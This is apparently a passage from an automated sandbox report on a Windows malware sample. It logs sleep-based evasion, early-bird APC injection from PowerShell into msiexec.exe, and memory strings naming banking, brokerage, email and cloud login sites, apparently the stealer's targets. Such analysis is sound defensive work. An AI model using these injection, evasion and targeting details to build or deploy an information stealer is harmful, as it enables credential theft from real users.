Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5936	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 336	Thread sleep count: 1356 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 336	Thread sleep count: 8449 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -599436s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -599216s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -598016s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -597688s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -597563s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -597202s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -596953s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -596724s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -596370s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -596248s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -596137s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -594990s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -593985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -593860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -593735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -593491s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -593365s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -593213s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -593068s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188	Thread sleep time: -592938s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Code function: 1_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405974
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Code function: 1_2_004064C6 FindFirstFileW,FindClose,	1_2_004064C6
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Code function: 1_2_004027FB FindFirstFileW,	1_2_004027FB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599436	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599216	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597202	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596724	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596370	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596248	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596137	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594990	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593491	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593365	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593213	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593068	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 592938	Jump to behavior

Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: ModuleAnalysisCache.5.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: msiexec.exe, 0000000B.00000002.3814361627.000000000A17B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: msiexec.exe, 0000000B.00000002.3814361627.000000000A17B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SeE
Source: ModuleAnalysisCache.5.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: msiexec.exe, 0000000B.00000002.3814361627.000000000A11A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd3255c2e76ef6<
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd32380b8cca17<
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: ModuleAnalysisCache.5.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000026FC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\r5yYt97sfB.exe	API call chain: ExitProcess graph end node			graph_1-3613
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	API call chain: ExitProcess graph end node			graph_1-3605

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_02DCD044 LdrInitializeThunk,LdrInitializeThunk,

11_2_02DCD044

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4290000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
